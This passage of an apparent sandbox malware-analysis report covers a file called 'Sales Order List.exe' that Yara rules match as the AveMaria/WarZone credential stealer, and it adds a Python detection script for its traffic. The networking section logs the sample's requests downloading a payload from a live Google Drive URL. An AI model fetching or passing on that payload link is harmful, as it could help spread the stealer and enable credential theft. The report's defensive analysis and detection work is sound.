                Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022159017.0000000006493000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb( source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023187158.00000000068BD000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb( source: WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: msctf.pdb( source: WerFault.exe, 00000014.00000003.125910562779.0000000005D02000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.125903704223.0000000002D7B000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.125903667098.0000000002D75000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb} source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: TextInputFramework.pdb( source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.125907817675.0000000002E17000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000014.00000003.125904042199.0000000002E01000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=downloads;R
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 93.184.220.29 93.184.220.29
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0k-48-docs.googleusercontent.com
    Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29 (7 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: explorer.exe, 0000000B.00000002.130410544642.000000000CFBC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
                Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
                Source: explorer.exe, 0000000B.00000002.130410016644.000000000CF7B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: explorer.exe, 0000000B.00000000.125786547597.000000000A940000.00000002.00020000.sdmpString found in binary or memory: http://schemas.micro
                Source: Sales Order List.exeString found in binary or memory: http://topqualityfreeware.com
                Source: Amcache.hve.LOG1.20.drString found in binary or memory: http://upx.sf.net
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: http://www.foreca.com
                Source: Sales Order List.exeString found in binary or memory: http://www.topqualityfreeware.com/
                Source: explorer.exe, 0000000B.00000002.130415876105.0000000010478000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
                Source: explorer.exe, 0000000B.00000000.125824449017.0000000002E75000.00000004.00000001.sdmp | String found in binary or memory: https://aka.ms/odirme
                Source: explorer.exe, 0000000B.00000002.130409357270.000000000CEEE000.00000004.00000001.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 0000000B.00000000.125824045068.0000000002E1A000.00000004.00000001.sdmp | String found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 0000000B.00000002.130406454585.000000000CBA2000.00000004.00000001.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000B.00000000.125782425758.00000000093FE000.00000004.00000001.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?P
                Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmp | String found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
                Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmp | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
                Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmp | String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivations
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
                Source: Sales Order List.exe | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
                Source: Sales Order List.exe, 00000004.00000003.125871810697.0000000001879000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
                Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
                Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/7
                Source: Sales Order List.exe, 00000004.00000003.125871877283.0000000001883000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/S~
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5i
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/w
                Source: Sales Order List.exe, 00000004.00000003.125871692204.0000000001870000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/4
                Source: Sales Order List.exe, 00000004.00000002.125877417935.0000000003310000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnY
                Source: Sales Order List.exe, 00000004.00000003.125743205436.00000000018AE000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnawmvg8FJU4CwcICFY
                Source: Sales Order List.exe, 00000004.00000002.125875077297.0000000001827000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvnc
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp | String found in binary or memory: https://excel.office.com
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp | String found in binary or memory: https://excel.office.comn
                Source: Sales Order List.exe, 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmp | String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
                Source: explorer.exe, 0000000B.00000000.125852646377.0000000010C17000.00000004.00000001.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp | String found in binary or memory: https://outlook.comows.CB
                Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmp | String found in binary or memory: https://powerpoint.office.com8
                Source: WerFault.exe, 00000014.00000003.125950197304.0000000002D61000.00000004.00000001.sdmp | String found in binary or memory: https://watson.telemet
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://windows.msn.com:443/shell
                Source: explorer.exe, 0000000B.00000002.130416256186.00000000104AE000.00000004.00000001.sdmp | String found in binary or memory: https://wns.windows.com/
                Source: explorer.exe, 0000000B.00000000.125794870721.000000000D0C8000.00000004.00000001.sdmp | String found in binary or memory: https://word.office.com
                Source: explorer.exe, 0000000B.00000002.130414430727.0000000010370000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
                Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/?ocid=iehp
                Source: explorer.exe, 0000000B.00000000.125847133037.000000000D094000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/?ocid=iehpA
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                Source: explorer.exe, 0000000B.00000000.125834112831.0000000009433000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpU
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: unknown | DNS traffic detected: queries for: drive.google.com
                Source: global traffic | HTTP traffic detected:
                    GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                    Host: drive.google.com
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected:
                    GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                    Cache-Control: no-cache
                    Host: doc-0k-48-docs.googleusercontent.com
                    Connection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2
                Source: WerFault.exe, 00000014.00000003.125903793452.0000000002D9E000.00000004.00000001.sdmp | Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
                Source: Sales Order List.exe | Binary or memory string: GetRawInputData
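                The two request heads recorded above carry the same Google Drive file id through both hops (the drive.google.com landing URL and the doc-*-docs.googleusercontent.com redirect), and both present an IE11 (Trident/7.0) User-Agent with none of the Accept headers a real IE11 page load sends. The Python below is an added example written for this page; it is not part of the report or of any sandbox tooling. It parses raw request heads of that shape, extracts the file id from both URL forms, ties the hops together by id, and flags the loader-style header set. The two sample requests are re-typed from the report entries; the benign control request, the host www.example.com and the "Trident UA without Accept" heuristic are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: the two requests from the report, re-typed as raw
# HTTP/1.1 request heads with one header per line (not a live capture).
SAMPLE_REQUESTS = [
    "GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: drive.google.com\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln"
    "/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Cache-Control: no-cache\r\n"
    "Host: doc-0k-48-docs.googleusercontent.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]

# Constructed control: what a genuine IE11 navigation looks like (assumed host).
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Accept: text/html, application/xhtml+xml, */*\r\n"
    "Accept-Language: en-US\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: www.example.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

TRIDENT_UA = re.compile(r"Trident/7\.0;.*\blike Gecko$")
DRIVE_ID = re.compile(r"^[A-Za-z0-9_-]{25,}$")  # Drive ids are long URL-safe tokens


def parse_request(raw):
    """Split a raw request head into method, target, version and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def drive_file_id(req):
    """Return the Drive file id for either download URL shape seen in the report, else None."""
    host = req["headers"].get("host", "")
    parts = urlsplit(req["target"])
    qs = parse_qs(parts.query)
    if host == "drive.google.com" and parts.path == "/uc" and qs.get("export") == ["download"]:
        fid = qs.get("id", [""])[0]
        return fid if DRIVE_ID.match(fid) else None
    if host.endswith(".googleusercontent.com") and parts.path.startswith("/docs/securesc/") \
            and qs.get("e") == ["download"]:
        fid = parts.path.rsplit("/", 1)[-1]  # id is the last path segment
        return fid if DRIVE_ID.match(fid) else None
    return None


def classify(raw):
    """Return the list of findings for one request head (empty list when nothing matches)."""
    req = parse_request(raw)
    h = req["headers"]
    findings = []
    fid = drive_file_id(req)
    if fid:
        findings.append("gdrive-download:" + fid)
    # Assumed heuristic: IE11 navigations always send Accept; a Trident UA without
    # it is typical of WinINet/urlmon fetches issued by a loader, not the browser.
    if TRIDENT_UA.search(h.get("user-agent", "")) and "accept" not in h:
        findings.append("trident-ua-without-accept")
    return findings


def payload_chain(raws):
    """Return the Drive file id referenced by two or more requests (landing hop plus
    googleusercontent redirect), or None when no id is seen more than once."""
    counts = Counter(f for f in (drive_file_id(parse_request(r)) for r in raws) if f)
    for fid, n in counts.most_common(1):
        if n >= 2:
            return fid
    return None


if __name__ == "__main__":
    for r in SAMPLE_REQUESTS + [BENIGN_REQUEST]:
        print(parse_request(r)["headers"].get("host"), classify(r))
    print("payload id across hops:", payload_chain(SAMPLE_REQUESTS))
```

                The id-per-hop pivot is the useful part when triaging proxy logs: the googleusercontent.com hostname and the securesc path token rotate, but the file id at the end of the path is the same token that appeared in the drive.google.com landing request, so one rule on the id catches the download wherever Google redirects it.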

                E-Banking Fraud:

                Yara detected AveMaria stealer
                Source: Yara match | File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sample | Static PE information: Filename: Sales Order List.exe
                Source: Sales Order List.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022E1E3D
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022ED671
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022F6B37
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EDBA3
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022ED01F
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022E3D31
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EC22A
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022E4279
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EAE56
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022E42A5
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EAAA3
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EA68C
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EE295
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EA691
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function: 2_2_022EC2E4
                Source: C:\Users\user\Desktop\Sales Order List.exe | Code function